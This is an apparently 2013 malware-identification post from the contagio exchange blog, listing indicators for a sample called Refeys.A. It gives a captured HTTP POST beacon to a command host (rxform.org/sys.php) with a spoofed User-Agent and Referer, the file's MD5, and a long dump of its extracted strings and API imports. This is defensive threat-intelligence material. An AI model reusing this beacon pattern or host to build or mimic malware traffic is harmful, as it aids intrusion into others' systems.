About contagio exchange

CONTAGIO EXCHANGE Contagio exchange was created to absorb malware samples shared by readers of Contagio. This is meant to be a community driven malware collection.
Edit Aug 2013 - The community is busy and Mila too so this was not a very active site (my fault probably) so I will be just dumping malware strings here - it often helps in malware identification and googling is the best way.
With just strings, not exactly a fun blog to read but might become s useful resource over time.
I will not be posting samples here, just md5. You can find the corresponding samples on contagio or ping me if you can't find
M
P.S. Robot pictures delivered by Robohash.com (generated from file hashes)

Wednesday, August 21, 2013

Refeys.A strings - CRIME

Traffic

POST /sys.php HTTP/1.0
Host: rxform.org
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20021216 Chimera/0.6
Referer:  http://www.gmail.com
Content-length: 112



File: Refeys.A_BEDE0DA1ABC1122ACF8AF91F6D6B289F.exe_
MD5:  bede0da1abc1122acf8af91f6d6b289f
Size: 58880


Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
.text
`.rdata
@.data
.sxdata
.rsrc
@.reloc
15:~@
5]}@
-------------------snip
@_^[]
CRYPT32.dll
CertAddCRLContextToStore
CertAddCRLLinkToStore
CertAddCTLContextToStore
CertAddCTLLinkToStore
CertAddCertificateContextToStore
CertAddCertificateLinkToStore
CertAddEncodedCRLToStore
CertAddEncodedCTLToStore
CertAddEncodedCertificateToStore
CertAddEncodedCertificateToSystemStoreA
CertAddEncodedCertificateToSystemStoreW
CertAddEnhancedKeyUsageIdentifier
CertAddSerializedElementToStore
CertAddStoreToCollection
CertAlgIdToOID
CertCloseStore
CertCompareCertificate
CertCompareCertificateName
CertCompareIntegerBlob
CertComparePublicKeyInfo
CertControlStore
CertCreateCRLContext
CertCreateCTLContext
CertCreateCTLEntryFromCertificateContextProperties
CertCreateCertificateChainEngine
CertCreateCertificateContext
CertCreateContext
CertCreateSelfSignCertificate
CertDeleteCRLFromStore
CertDeleteCTLFromStore
CertDeleteCertificateFromStore
CertDuplicateCRLContext
CertDuplicateCTLContext
CertDuplicateCertificateChain
CertDuplicateCertificateContext
CertDuplicateStore
CertEnumCRLContextProperties
CertEnumCRLsInStore
CertEnumCTLContextProperties
CertEnumCTLsInStore
CertEnumCertificateContextProperties
CertEnumCertificatesInStore
CertEnumPhysicalStore
CertEnumSubjectInSortedCTL
CertEnumSystemStore
CertEnumSystemStoreLocation
CertFindAttribute
CertFindCRLInStore
CertFindCTLInStore
CertFindCertificateInCRL
CertFindCertificateInStore
CertFindChainInStore
CertFindExtension
CertFindRDNAttr
CertFindSubjectInCTL
CertFindSubjectInSortedCTL
CertFreeCRLContext
CertFreeCTLContext
CertFreeCertificateChain
CertFreeCertificateChainEngine
CertFreeCertificateContext
CertGetCRLContextProperty
CertGetCRLFromStore
CertGetCTLContextProperty
CertGetCertificateChain
CertGetCertificateContextProperty
CertGetEnhancedKeyUsage
CertGetIntendedKeyUsage
CertGetIssuerCertificateFromStore
CertGetNameStringA
CertGetNameStringW
CertGetPublicKeyLength
CertGetStoreProperty
CertGetSubjectCertificateFromStore
CertGetValidUsages
CertIsRDNAttrsInCertificateName
CertIsValidCRLForCertificate
CertNameToStrA
CertNameToStrW
CertOIDToAlgId
CertOpenStore
CertOpenSystemStoreA
CertOpenSystemStoreW
CertRDNValueToStrA
CertRDNValueToStrW
CertRegisterPhysicalStore
CertRegisterSystemStore
CertRemoveEnhancedKeyUsageIdentifier
CertRemoveStoreFromCollection
CertResyncCertificateChainEngine
CertSaveStore
CertSerializeCRLStoreElement
CertSerializeCTLStoreElement
CertSerializeCertificateStoreElement
CertSetCRLContextProperty
CertSetCTLContextProperty
CertSetCertificateContextPropertiesFromCTLEntry
CertSetCertificateContextProperty
CertSetEnhancedKeyUsage
CertSetStoreProperty
CertStrToNameA
CertStrToNameW
CertUnregisterPhysicalStore
CertUnregisterSystemStore
CertVerifyCRLRevocation
CertVerifyCRLTimeValidity
CertVerifyCTLUsage
CertVerifyCertificateChainPolicy
CertVerifyRevocation
CertVerifySubjectCertificateContext
CertVerifyTimeValidity
CertVerifyValidityNesting
ChainWlxLogoffEvent
CloseCertPerformanceData
CollectCertPerformanceData
CreateFileU
CryptAcquireCertificatePrivateKey
CryptAcquireContextU
CryptBinaryToStringA
CryptBinaryToStringW
CryptCloseAsyncHandle
CryptCreateAsyncHandle
CryptCreateKeyIdentifierFromCSP
CryptDecodeMessage
CryptDecodeObject
CryptDecodeObjectEx
CryptDecryptAndVerifyMessageSignature
CryptDecryptMessage
CryptEncodeObject
CryptEncodeObjectEx
CryptEncryptMessage
CryptEnumKeyIdentifierProperties
CryptEnumOIDFunction
CryptEnumOIDInfo
CryptEnumProviders
GetVersion
VirtualAlloc
GetCurrentProcessId
IsBadCodePtr
GetDiskFreeSpaceW
GetSystemTimeAsFileTime
GetSystemDirectoryA
lstrcmpi
FileTimeToSystemTime
lstrcpy
GetModuleHandleA
SleepEx
SetCurrentDirectoryW
CreateThread
CreateDirectoryA
GetExpandedNameA
GetThreadPriority
WinExec
KERNEL32.DLL
CreateWindowExW
SetWindowLongA
GetFocus
IsDlgButtonChecked
GetMenuStringW
CreateDialogParamA
GetForegroundWindow
CreateMenu
CreateDialogIndirectParamW
SetActiveWindow
wvsprintfW
DialogBoxIndirectParamW
GetClassInfoExW
GetTopWindow
SetWindowLongW
USER32.DLL
VarDecFromI1
VarUI8FromUI2
VarDecSub
VarCyFromR4
VarR8FromDate
OleLoadPictureEx
VarDateFromI8
VarDecFromCy
VarDateFromUI4
VarDateFromI1
VarDecCmp
VarR8FromDec
VarI2FromUI8
VarRound
RegisterTypeLib
VarDecFromUI8
VarUI8FromDate
VarDateFromStr
VarR8Pow
VarUI1FromBool
VarI4FromR4
VarDateFromUdate
VarBstrFromUI2
VarImp
DispGetIDsOfNames
VarCySub
GetVarConversionLocaleSetting
oleaut32.dll
CreateEllipticRgn
TranslateCharsetInfo
CreateFontW
CreateICW
gdi32.dll
m6<g
&3m&m&
IXPh
m&m&
h<-6<5
m&m&m&
 V t 
h<Skk
(yy_FF/
sSc$
m&m&V
GFZO
K.c$
sS0s
sSSG
6psS
qH'z
WqHsz
xESSSH
h<Sm&m&m&
h<m&
Vm&o
oSSS
op2SS
DSSSHw
2SSH
sSc$
RGec$
H'zF
m&m&m&
bYSSS
__Gu
szc$
%HSSS.
gsSSSW
q*tN^
26vR
t6vR
SSS|a
SSS|
SSS|j^t
g>SSS
g8SSSW
gNSSS
?RRt6
mz<<kkk
&m5<
m&m&
m&m&
&m&m&m&Nih
kpCVBnunGZBMPGgvkEyVipix
.8#&,&->@-)+;=5+3*:!5Xepewehypus
ANDUWfypr
?'47+3=8/<13%+6'60%)
tdDDTWrZnHdYSypnZgYEGg
gJhfNYlTlPxCC,:6&2">.!/*>,.
?1(&+*36=D
!-#;!/;('
mUfGKUjIaEFCGZVKC
Domec
/$%?OsLJyG0:()/)@6#.@9=:
=;:'&:
$!#&@6.>
Pff0}
2&<9&&9)3?+>
$911:4:>(1)5'4'BZa
"?;?
,1! ---------------------snip
RJk&ZJk<ORk
Y<33<Y
########
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD

Unicode Strings:
---------------------------------------------------------------------------
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
jjjj
@jjjj
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Bitet
Jebo
Coposa
VS_VERSION_INFO
StringFileInfo
04090000
LegalCopyright
fLiqjPPlr
CompanyName
Yaldex Software
FileVersion
0.9.7.7
VarFileInfo
Translation